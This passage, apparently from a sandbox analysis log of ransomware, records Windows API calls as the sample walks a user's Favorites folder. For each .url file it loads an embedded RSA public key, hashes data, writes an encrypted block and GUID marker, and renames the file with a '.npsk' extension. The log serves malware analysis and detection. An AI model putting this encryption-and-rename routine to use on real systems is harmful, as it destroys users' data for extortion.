lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0x85, lpOverlapped=0x0) returned 1 [0216.525] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.525] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.525] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.525] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b1ce8) returned 1 [0216.526] CryptCreateHash (in: hProv=0x7b1ce8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0216.526] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0216.526] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0216.526] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0216.526] GetLastError () returned 0x0 [0216.526] CryptDestroyHash (hHash=0x3277d68) returned 1 [0216.527] CryptReleaseContext (hProv=0x7b1ce8, dwFlags=0x0) returned 1 [0216.527] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0216.527] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0216.527] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0216.527] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a92af8, Size=0x218) returned 0x3a8b1c8 [0216.527] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x85, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0216.527] WriteFile (in: hFile=0x61c, lpBuffer=0x3227170*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3227170*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0216.527] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0216.527] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0216.527] CloseHandle (hObject=0x61c) returned 1 [0216.528] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Entertainment.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn entertainment.url"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Entertainment.url.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn entertainment.url.npsk")) returned 1 [0216.529] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSN Money.url", cAlternateFileName="MSNMON~1.URL")) returned 1 [0216.529] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Money.url") returned=".url" [0216.529] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Money.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn money.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0216.532] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=133) returned 1 [0216.532] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0216.533] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x5f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0216.533] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0216.534] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0x85, lpOverlapped=0x0) returned 1 [0216.534] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.534] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.534] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.534] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b1ce8) returned 1 [0216.535] CryptCreateHash (in: hProv=0x7b1ce8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0216.535] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0216.535] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0216.535] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0216.535] GetLastError () returned 0x0 [0216.535] CryptDestroyHash (hHash=0x3277d68) returned 1 [0216.535] CryptReleaseContext (hProv=0x7b1ce8, dwFlags=0x0) returned 1 [0216.535] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0216.535] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0216.536] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0216.536] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a92af8, Size=0x218) returned 0x3a8b1c8 [0216.536] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x85, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0216.536] WriteFile (in: hFile=0x61c, lpBuffer=0x3227170*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3227170*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0216.536] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0216.536] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0216.536] CloseHandle (hObject=0x61c) returned 1 [0216.537] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Money.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn money.url"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Money.url.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn money.url.npsk")) returned 1 [0216.538] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSN Sports.url", cAlternateFileName="MSNSPO~1.URL")) returned 1 [0216.538] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Sports.url") returned=".url" [0216.538] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Sports.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn sports.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0216.544] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=133) returned 1 [0216.544] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0216.545] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x5f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0216.545] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0216.546] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0x85, lpOverlapped=0x0) returned 1 [0216.546] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.546] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.546] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.546] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b1ce8) returned 1 [0216.547] CryptCreateHash (in: hProv=0x7b1ce8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0216.547] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0216.547] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0216.547] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0216.547] GetLastError () returned 0x0 [0216.547] CryptDestroyHash (hHash=0x3277d68) returned 1 [0216.547] CryptReleaseContext (hProv=0x7b1ce8, dwFlags=0x0) returned 1 [0216.547] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0216.547] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0216.547] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0216.548] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a92af8, Size=0x218) returned 0x3a8b1c8 [0216.548] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x85, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0216.548] WriteFile (in: hFile=0x61c, lpBuffer=0x3227170*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3227170*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0216.548] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0216.548] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0216.548] CloseHandle (hObject=0x61c) returned 1 [0216.549] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Sports.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn sports.url"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Sports.url.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn sports.url.npsk")) returned 1 [0216.550] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSN.url", cAlternateFileName="")) returned 1 [0216.550] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN.url") returned=".url" [0216.550] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0216.551] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=133) returned 1 [0216.551] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0216.553] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x5f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0216.553] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0216.553] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0x85, lpOverlapped=0x0) returned 1 [0216.553] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.553] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.554] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.554] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b1ce8) returned 1 [0216.554] CryptCreateHash (in: hProv=0x7b1ce8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0216.555] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0216.555] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0216.556] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0216.556] GetLastError () returned 0x0 [0216.556] CryptDestroyHash (hHash=0x3277d68) returned 1 [0216.556] CryptReleaseContext (hProv=0x7b1ce8, dwFlags=0x0) returned 1 [0216.556] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0216.556] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0216.556] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0216.556] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a92af8, Size=0x218) returned 0x3a8b1c8 [0216.556] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x85, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0216.556] WriteFile (in: hFile=0x61c, lpBuffer=0x3227170*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3227170*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0216.556] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0216.556] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, 